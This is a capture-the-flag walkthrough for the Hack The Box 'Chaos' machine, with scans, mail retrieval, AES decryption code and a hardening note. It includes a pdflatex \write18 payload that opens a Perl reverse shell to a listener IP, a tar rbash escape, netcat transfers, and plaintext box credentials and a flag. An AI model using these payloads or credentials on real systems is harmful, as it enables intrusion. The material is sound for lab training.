Preparation: go to the HTB Access page and set up the VPN.
Download the matching configuration file and connect with: openvpn xx.ovpn
Configure the network accordingly.
The page then shows whether the connection succeeded, along with the IPv4 address, IPv6 address, traffic, server address and server port.
Then go to the machine list and pick a suitable box to practice on.
nmap -sS 10.10.10.120
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 06:18 EDT
Nmap scan report for chaos.htb (10.10.10.120)
Host is up (0.23s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
80/tcp open http
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 3.08 seconds
Port 80 is open, so let's see what it serves. Not much: it tells us that direct access by IP is not allowed. This detail comes up again later.
curl 10.10.10.120
<h1><center><font color="red">Direct IP not allowed</font></center></h1>
Approach 1: append ?author=1 to the URL in the browser and the author's name, human, appears at the bottom of the page. Enter that name into the Password field.
Approach 2: run wpscan to see what it finds: wpscan --url http://10.10.10.120/wp/wordpress -e. This also reveals the username.
Entering it unlocks the page, which contains the webmail credentials: ayush/jiujitsu.
dirb http://10.10.10.120
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu May 9 06:24:30 2019
URL_BASE: http://10.10.10.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.120/ ----
+ http://10.10.10.120/index.html (CODE:200|SIZE:73)
==> DIRECTORY: http://10.10.10.120/javascript/
+ http://10.10.10.120/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://10.10.10.120/wp/
---- Entering directory: http://10.10.10.120/javascript/ ----
==> DIRECTORY: http://10.10.10.120/javascript/jquery/
---- Entering directory: http://10.10.10.120/wp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.120/javascript/jquery/ ----
+ http://10.10.10.120/javascript/jquery/jquery (CODE:200|SIZE:268026)
-----------------
END_TIME: Thu May 9 07:20:53 2019
DOWNLOADED: 13836 - FOUND: 3
$ tag fetch 1 body[text]
* 1 FETCH (BODY[TEXT] {2183}
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowed
Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804
--=_00b34a28b9033c43ed09c0950f4176e1--
)
tag OK Fetch completed (0.006 + 0.000 + 0.005 secs).
The message carries two attachments, enim_msg.txt and en.py; base64-decode both.
The decoded enim_msg.txt is binary ciphertext (not reproduced here). Its first 16 bytes are the ASCII string 0000000000000234, the zero-padded plaintext length that en.py writes before the IV, so the original message is 234 bytes long.
import os
from Crypto import Random          # PyCrypto / PyCryptodome, as the original script uses
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    # plaintext length as a 16-character zero-padded decimal string, written first
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    # pad the last chunk with spaces (not PKCS#7) to a multiple of the AES block size
                    chunk += b' ' * (16 - (len(chunk) % 16))
                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    # the AES key is the raw SHA-256 digest of the password
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()
Being lazy, I simply grabbed a matching encrypt/decrypt script from Google.
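The container format that en.py produces (16-character zero-padded length, 16-byte IV, then AES-CBC of the space-padded plaintext under SHA-256(password)) written out in Go together with the matching decryptor. This is an added example, not the original script or anything from the box; the message and password it is tested with are constructed values.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"strconv"
)

// getKey mirrors en.py's getKey: the AES-256 key is the raw SHA-256 digest of the password.
func getKey(password string) []byte {
	sum := sha256.Sum256([]byte(password))
	return sum[:]
}

// encrypt writes the en.py container: zero-padded decimal length, IV, then AES-CBC of the plaintext space-padded (not PKCS#7).
func encrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil { return nil, err }
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil { return nil, err }
	padded := append([]byte{}, plaintext...)
	for len(padded)%aes.BlockSize != 0 {
		padded = append(padded, ' ')
	}
	out := append([]byte(fmt.Sprintf("%016d", len(plaintext))), iv...)
	body := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(body, padded)
	return append(out, body...), nil
}

// decrypt parses the container and uses the length header to strip the space padding exactly.
func decrypt(key, blob []byte) ([]byte, error) {
	if len(blob) < 32 || (len(blob)-32)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("malformed container: %d bytes", len(blob))
	}
	size, err := strconv.Atoi(string(blob[:16])) // e.g. "0000000000000234" -> 234
	if err != nil || size < 0 || size > len(blob)-32 {
		return nil, fmt.Errorf("bad length header %q", blob[:16])
	}
	block, err := aes.NewCipher(key)
	if err != nil { return nil, err }
	plain := make([]byte, len(blob)-32)
	cipher.NewCBCDecrypter(block, blob[16:32]).CryptBlocks(plain, blob[32:])
	return plain[:size], nil
}
```

The length header is what makes the space padding reversible: without it a message ending in spaces could not be recovered exactly.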
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK
Decrypting it yields a URL. Visiting it tells you again that direct access is not allowed, which ties back to the first message we saw.
It can be reached as http://chaos.htb instead. The message itself also reveals the two account names, sahay and ayush.
base64 -d enim_msg_base64.txt
Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush
Let's look at what this URL offers. It is a txt-to-PDF plugin,
which turns out to be a pdflatex attack (see the learning link).
Clicking "create pdf" executes the command while the PDF is generated, giving a reverse shell directly.
The page says only one template can be used; after trying them it turns out to be the test3 template. After entering the body and clicking generate,
the page gives no direct feedback, so the browser developer tools are needed to see the result. The generated PDF is located at
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/
\immediate\write18{perl -e 'use Socket;$i="10.10.14.37";$p=6666;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}
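What makes the \write18 step above possible is the TeX engine's shell-escape setting. Added here as a defender's note that is not part of the original write-up: the texmf.cnf values that control it, TeX Live's default restricted mode first and the hardened value for a service that builds PDFs from user-supplied text second (the command list is abbreviated and illustrative).

```conf
% texmf.cnf, TeX Live default: restricted shell escape. \write18 may only run the
% programs listed in shell_escape_commands; an arbitrary command such as perl is refused.
shell_escape = p
shell_escape_commands = bibtex,kpsewhich,makeindex

% Hardened value for a PDF-from-upload service: no \write18 at all.
shell_escape = f
```

The payload on this box only works because the engine runs in unrestricted mode (shell_escape = t, or pdflatex invoked with --shell-escape); passing -no-shell-escape on the command line disables it for that invocation regardless of the file setting.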
$ python -c 'import pty; pty.spawn("/bin/bash")'
$su ayush
Password:jiujitsu
This switches to ayush's session, but it is an rbash: PATH is set to /home/ayush/.app, which refuses almost every command.
After some trial, dir runs normally, and the .app directory contains tar, so tar is used to escape the rbash (see the learning link).
Escape PoC: tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
Once a normal bash is obtained, fix the PATH with export PATH=$PATH:/usr/bin/ and print user.txt.
eef39126d9c3b4b8a30286970dc713e1
nc -l -p 39808 > firefox_decrypt.py   # receiving side (listener)
nc -w 3 10.10.10.120 39808 < firefox_decrypt.py   # sending side
Website: https://chaos.htb:10000 Username: 'root' Password: 'Thiv8wrej~'
References: